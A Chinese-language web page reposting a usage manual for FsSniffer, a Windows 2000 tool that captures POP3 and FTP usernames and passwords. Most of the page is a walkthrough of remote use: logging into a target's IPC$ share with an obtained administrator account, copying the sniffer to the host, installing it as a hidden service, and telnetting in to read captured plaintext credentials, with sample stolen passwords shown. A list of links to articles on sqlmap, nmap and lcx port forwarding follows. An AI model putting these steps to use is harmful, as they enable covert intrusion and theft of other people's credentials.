流影 POP3/FTP Sniffer 說明
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 22:12:24 作者:佚名
我要評論
FsSniffer只能在Windows 2000中使用,可以捕捉到本機和基于非交換環(huán)境局域網(wǎng)的POP3/FTP用戶名和密碼。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP:指綁定的IP地址,通常就是本地主機IP地址。Port:控制的端口,以后要通
FsSniffer只能在Windows 2000中使用,可以捕捉到本機和基于非交換環(huán)境局域網(wǎng)的POP3/FTP用戶名和密碼。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP:指綁定的IP地址,通常就是本地主機IP地址。Port:控制的端口,以后要通過這個端口登陸上去查看結果。Control Password:登陸時的密碼。登陸上去后的命令Show Result:查看捕獲的記錄Quit:退出ShutDown:結束Sniffer的運行二、遠程使用例如:得到主機211.152.188.1的一個屬于管理員組的帳號test:test,首先登錄。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.將fssniffer.exe復制到遠程主機。(也可以用流光IV中提供的工具“種植者”來做這件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied. 利用流光IV中的NTCMD啟動FsSniffer.EXE,并將器安裝成為服務=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http://www.netXeyes.com http://www.netXeyes.orgNTCMD>verMicrosoft Windows 2000 [Version 5.00.2195]NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001TestSniffer1 installed. NTCMD> 這樣在遠程主機上面安裝了一個服務ShadowSniffer。用net命令啟動服務NTCMD>net start shadowsnifferThe ShadowSniffer service is starting..The ShadowSniffer service was started successfully.安裝成為服務的格式:FsSniffer -I <Username> <Password> <Service Name> <Bind Local IP> <Port> <Control Password>UserName:遠程主機的用戶名(必須具有超級用戶權限)Passwod:遠程主機的密碼Service Name:安裝的服務名稱,如果安裝失敗,可以將FsSniffer.exe改名再試。Bind Local IP:遠程主機的IP。某些主機具有兩個IP地址,這是就需要根據(jù)需要選擇監(jiān)聽的IP地址(例如:局域網(wǎng)和外網(wǎng))Port:遠程控制的端口Control Password:遠程控制的密碼過一段時間就可以登陸到FsSniffer開的端口7上面,查看結果了。D:>telnet 211.152.188.1 7Control Password: **************===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================Written by Assassin, Server Edition FluxShadow@21cn.com==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕軟件實驗室™ 1995-2001版權所有www.netXeyes.com www.netXeyes.orgdansnow@21cn.com
相關文章
一個自動化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04- Nmap是一款網(wǎng)絡掃描和主機檢測的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時可以用來作為一個漏洞探測器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個注入工具,其實在注入工具方面,很多人都是通過這個工具實施的檢測與注入,對于我們從事安全防御的人來說,一定要引起注意,一般的程序員寫的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結,需要的朋友可以參考下2017-09-06
lcx端口轉發(fā)詳細介紹及使用方法(lcx內網(wǎng)轉發(fā)姿勢)
這篇文章主要介紹了lcx端口轉發(fā)詳細介紹及使用方法(lcx內網(wǎng)轉發(fā)姿勢),需要的朋友可以參考下2017-09-06- 這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關于掃描防火墻,IDS / IPS 逃逸,Web服務器滲透測試等。在此之前,我們應該了解一下防火墻的一些基礎知識以便2016-12-27
- 眾所周知NMAP是經(jīng)常用來進行端口發(fā)現(xiàn)、端口識別。除此之外我們還可以通過NMAP的NSE腳本做很多事情,比如郵件指紋識別,檢索WHOIS記錄,使用UDP服務等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級NMAP掃描的技術,我們將進行一個中間人攻擊(MITM)?,F(xiàn)在,游戲開始了2016-12-27
- nmap是一個網(wǎng)絡連接端掃描軟件,用來掃描網(wǎng)上電腦開放的網(wǎng)絡連接端。確定哪些服務運行在哪些連接端,并且推斷計算機運行哪個操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡稱AWVS)是一款知名的網(wǎng)絡漏洞掃描工具,它通過網(wǎng)絡爬蟲測試你的網(wǎng)站安全,檢測流行安全漏洞。倫敦時間2015年6月24日,官方發(fā)布了2016-09-28


